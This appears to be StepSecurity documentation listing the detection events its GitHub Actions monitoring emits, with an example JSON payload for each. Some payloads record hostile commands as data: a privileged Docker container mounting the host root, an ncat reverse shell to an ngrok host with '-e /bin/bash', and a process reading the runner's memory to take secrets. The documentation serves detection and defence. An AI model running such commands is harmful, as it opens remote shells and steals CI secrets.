Integrations

StepSecurity supports integrations with external platforms to enhance your security workflows, automate telemetry export, and streamline policy enforcement.

We currently support two third party integrations:

Detection Scenarios

Each detection event is emitted in real-time and includes detailed metadata about the workflow, job, detection, and offending artifacts. Below is a list of detection types currently supported by StepSecurity, along with example payloads for each.

Action-Uses-Commit-From-Non-Default-Branch

{
"id": "Action-Uses-Commit-From-Non-Default-Branch",
"name": "Action Uses Commit From Non Default Branch",
"owner": "actions-security-demo",
"repo": "actions-security-demo/poc-1",
"workflow_id": "actions-security-demo-actions-security-demo/poc-1-.github-workflows-test-workflow.yaml",
"workflow_path": ".github/workflows/test-workflow.yaml",
"run_id": "14372875584",
"job_id": "40299087623",
"job": "Test",
"timestamp": "1744262248",
"detection": "Action-Uses-Commit-From-Non-Default-Branch-14372875584-40299087623",
"id_timestamp": "Action-Uses-Commit-From-Non-Default-Branch-1744262248",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"imposter_commit": {
"action": "ashishkurmi/hello-action",
"tag": "main",
"sha": "c5327f7d9d31e29e58e788cb3c2727f773b3d0c4",
"timestamp": "1744262248"
  }
}

Action-Uses-Imposter-Commit

{
  "id": "Action-Uses-Imposter-Commit",
  "name": "GitHub Action Uses Imposter Commit",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445268",
  "job": "imposter-commit",
  "timestamp": "1753203994",
  "detection": "Action-Uses-Imposter-Commit-step-security/dummy-compromised-action-c96c327cecdb71e8f031080ba8ad208feb25b13d",
  "id_timestamp": "Action-Uses-Imposter-Commit-1753203994",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "imposter_commit": {
    "action": "step-security/dummy-compromised-action",
    "tag": "v1",
    "sha": "c96c327cecdb71e8f031080ba8ad208feb25b13d",
    "timestamp": "1753203994",
    "is_imposter_commit": true,
    "is_commit_on_default_branch": false
  },
  "owner_repo": "step-security/poc-workflows"
}

Domain-Blocked

{
  "id": "Domain-Blocked",
  "name": "Domain Blocked",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445322",
  "endpoint": "0.tcp.us-cal-1.ngrok.io.",
  "timestamp": "1753204032",
  "detection": "Domain-Blocked-0.tcp.us-cal-1.ngrok.io.",
  "id_timestamp": "Domain-Blocked-1753204032",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

HTTPS-Outbound-Network-Call

{
  "id": "HTTPS-Outbound-Network-Call",
  "name": "HTTPS Outbound Call",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445302",
  "timestamp": "1753204001",
  "detection": "HTTPS-Outbound-Network-Call-POST-api.github.com",
  "method": "POST",
  "host": "api.github.com",
  "path": "/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token",
  "id_timestamp": "HTTPS-Outbound-Network-Call-1753204001",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

New-Outbound-Network-Call

{
  "id": "New-Outbound-Network-Call",
  "name": "New Outbound Network Call",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445257",
  "job": "anomalous-outbound-call",
  "endpoint": "5ad46aa12a0f0fc0.example.com:443",
  "timestamp": "1753204032",
  "detection": "New-Outbound-Network-Call-5ad46aa12a0f0fc0.example.com:443",
  "expected_outbound_connections": [
    "github.com:443",
    "www.google.com:443",
    "goreleaser.com:443",
    "7f6045df5f070c28.example.com:443",
    "f6daed2a23eaf1c1.example.com:443",
    "4baf29081c970e17.example.com:443",
    "98a77cfd80e40ed6.example.com:443",
    "0de402b8ec115cc9.example.com:443"
  ],
  "id_timestamp": "New-Outbound-Network-Call-1753204032",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

Privileged-Container

{
  "id": "Privileged-Container",
  "name": "Privileged Container Detected",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445255",
  "job": "privileged-conatiner",
  "timestamp": "1753203999",
  "detection": "Privileged-Container-privileged-conatiner",
  "id_timestamp": "Privileged-Container-1753203999",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows",
  "process_events": [
    {
      "pid": "2489",
      "ppid": "2488",
      "exe": "/usr/bin/docker",
      "working_directory": "/home/runner/work/poc-workflows/poc-workflows",
      "arguments": [
        "docker",
        "run",
        "--privileged",
        "--cap-add=ALL",
        "-v",
        "/:/host",
        "raesene/ncat:latest",
        "0.tcp.us-cal-1.ngrok.io",
        "17658",
        "-e",
        "/bin/bash"
      ],
      "timestamp": "2025-07-22T17:06:39.374Z"
    }
  ]
}

Reverse-Shell

{
  "id": "Reverse-Shell",
  "name": "Reverse shell detected",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445255",
  "job": "privileged-conatiner",
  "timestamp": "1753204005",
  "detection": "Reverse-Shell-privileged-conatiner",
  "id_timestamp": "Reverse-Shell-1753204005",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows",
  "process_events": [
    {
      "pid": "2569",
      "ppid": "2547",
      "exe": "/usr/local/bin/ncat",
      "working_directory": "/",
      "arguments": [
        "/usr/local/bin/ncat",
        "0.tcp.us-cal-1.ngrok.io",
        "17658",
        "-e",
        "/bin/bash"
      ],
      "timestamp": "2025-07-22T17:06:45.265Z"
    }
  ]
}

Runner-Worker-Memory-Read

{
  "id": "Runner-Worker-Memory-Read",
  "name": "Runner Worker Memory Read",
  "owner": "step-security",
  "repo": "armour-tests",
  "workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16463564626",
  "job_id": "46535652393",
  "job": "tj-actions-simulation",
  "timestamp": "1753253227",
  "detection": "Runner-Worker-Memory-Read-tj-actions-simulation",
  "id_timestamp": "Runner-Worker-Memory-Read-1753253227",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/armour-tests",
  "process_events": [
    {
      "pid": "2068",
      "exe": "python3",
      "timestamp": "2025-07-23T06:47:07.869380629Z",
      "armour_event_process": {
        "armour_event_kind": "FILE_READ",
        "timestamp": "2025-07-23T06:47:07.869380629Z",
        "file_info": {
          "is_write": false,
          "current_pid": 2068,
          "current_exe": "python3",
          "target_file": "/proc/1798/mem",
          "target_pid": 1798,
          "target_exe": "Runner.Worker"
        },
        "enforced_protection": false
      }
    }
  ]
}

Secret-In-Build-Log

{
  "id": "Secret-In-Build-Log",
  "name": "Secret In Build Log",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445378",
  "timestamp": "1753204001",
  "detection": "Secret-In-Build-Log-handle-private-key-private-key",
  "secret": "----*******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
  "line_number": "14",
  "rule_id": "private-key",
  "job_name": "handle-private-key",
  "step_number": "5",
  "id_timestamp": "Secret-In-Build-Log-1753204001",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

Source-Code-Overwritten

{
  "id": "Source-Code-Overwritten",
  "name": "Source Code Overwritten",
  "owner": "step-security",
  "repo": "armour-tests",
  "workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16476557099",
  "job_id": "46579649138",
  "job": "source-code",
  "file": "README.MD",
  "timestamp": "1753288775",
  "detection": "Source-Code-Overwritten-README.MD",
  "path": "/home/runner/work/armour-tests/armour-tests/README.MD",
  "id_timestamp": "Source-Code-Overwritten-1753288775",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/armour-tests"
}

Actions-Policy-Blocked

{
    "id": "Actions-Policy-Blocked",
    "name": "Actions Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Actions-Policy-Blocked-16625207256",
    "id_timestamp": "1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "actions_not_allowed": [
      "step-security/harden-runner@rc-20-int",
      "actions/checkout@v3",
      "step-security/dummy-compromised-action@v1",
      "actions/checkout@v4"
    ]
  }

Runs-On-Policy-Blocked

{
    "id": "Runs-On-Policy-Blocked",
    "name": "Runs-On Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Runs-On-Policy-Blocked-16625207256",
    "id_timestamp": "Runs-On-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "runs_on_labels_not_allowed": ["label1", "label2", ...]
  }

Secrets-Policy-Blocked

{
    "id": "Secrets-Policy-Blocked",
    "name": "Secrets Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Secrets-Policy-Blocked-16625207256",
    "id_timestamp": "Secrets-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "workflow_contains_secrets": "true/false",
    "is_non_default_branch": "true/false",
    "workflow_matches_default_ref": "true/false",
    "current_branch_hash": "[hash]",
    "default_branch_hash": "[hash]"
  }

Compromised-Actions-Policy-Blocked

{
    "id": "Compromised-Actions-Policy-Blocked",
    "name": "Compromised Actions Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Compromised-Actions-Policy-Blocked-16625207256",
    "id_timestamp": "Compromised-Actions-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "compromised_actions_detected": ["compromised-action1", "compromised-action2", ...]
  }

Last updated

Was this helpful?